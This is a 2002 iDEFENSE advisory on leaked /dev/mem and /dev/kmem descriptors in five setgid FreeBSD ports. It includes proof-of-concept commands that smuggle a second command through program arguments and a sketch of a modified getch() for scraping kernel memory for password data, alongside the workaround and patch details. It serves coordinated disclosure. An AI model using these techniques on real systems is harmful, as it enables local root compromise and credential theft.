idefense.libkvm.txt

`iDEFENSE Security Advisory 09.16.2002   
FreeBSD Ports libkvm Security Vulnerabilities  
  
  
DESCRIPTION  
  
The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2   
can be locally manipulated to take advantage of open file   
descriptors /dev/mem and /dev/kmem to gain root privileges on   
a target host. These five programs are installed setgid kmem   
by default. They will drop kmem privileges before executing   
user specified commands but file descriptors to /dev/mem and   
/dev/kmem will remain open. This can lead to a local root   
compromise in various ways (e.g. if an attacker chooses to   
scan for the master password file in the Linux kernel memory).  
  
  
ANALYSIS  
  
The latest versions of all five above mentioned FreeBSD ports   
are vulnerable, the following examples illustrate the   
problems:   
  
bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep   
dummy|grep mem"  
  
dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem  
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem  
  
  
bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep  
mem"   
  
dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem  
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem  
  
  
bash-2.05a$ cat .wmmonrc   
left "/home/dim/dummy"   
bash-2.05a$ wmmon &   
[1] 793   
bash-2.05a$ Monitoring 5 devices for activity.   
current stat is :1   
  
bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem   
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem   
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem   
  
  
bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep   
dummy|grep mem"  
wmnet: using kmem driver to monitor ec0  
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem  
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem   
  
  
One possible exploit for these vulnerabilities is to replace   
getch() in strings(1) with:   
  
int getch()   
{  
char buf[4];  
read(4,buf,1);  
return buf[0];  
}  
  
or a similar less CPU expensive function that reads a   
character from the /dev/mem file descriptor and execute the   
following:  
  
wmnet2 -e exploit|grep root|grep Charlie   
  
  
DETECTION  
  
The latest copies of asmon, ascpu, bubblemon, wmmon, and   
wmnet2 from the FreeBSD ports collection are vulnerable and   
were tested on 4.6-RELEASE of FreeBSD. According to FreeBSD,   
all FreeBSD ports that use libkvm prior to and including   
4.6.2-RELEASE may also be vulnerable.  
  
  
WORKAROUND  
  
Remove the setgid bit on the affected applications,   
however reducing the functionality:  
  
chmod g-s /path.to/wmnet2   
  
  
VENDOR RESPONSE  
  
The FreeBSD advisory to be released in coordination with this   
advisory is FreeBSD-SA-02:39.libkvm. FreeBSD has provided  
the following patch details:  
  
"Upgrade your vulnerable system to 4.6-STABLE; or to the   
RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated   
after the correction date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20,   
or 4.4-RELEASE-p27)."  
  
  
DISCLOSURE TIMELINE  
  
August 12, 2002 - Disclosed to iDEFENSE  
September 6, 2002 - Disclosed to FreeBSD Security  
September 6, 2002 - Disclosed to iDEFENSE clients  
September 16, 2002 - Coordinated public disclosure by FreeBSD  
and iDEFENSE  
  
  
CREDIT  
  
This issue was exclusively disclosed to iDEFENSE by   
[email protected]  
  
http://www.idefense.com/contributor.html  
  
  
  
David Endler, CISSP  
Director, Technical Intelligence  
iDEFENSE, Inc.  
14151 Newbrook Drive  
Suite 100  
Chantilly, VA 20151  
voice: 703-344-2632  
fax: 703-961-1071  
  
[email protected]  
www.idefense.com  
`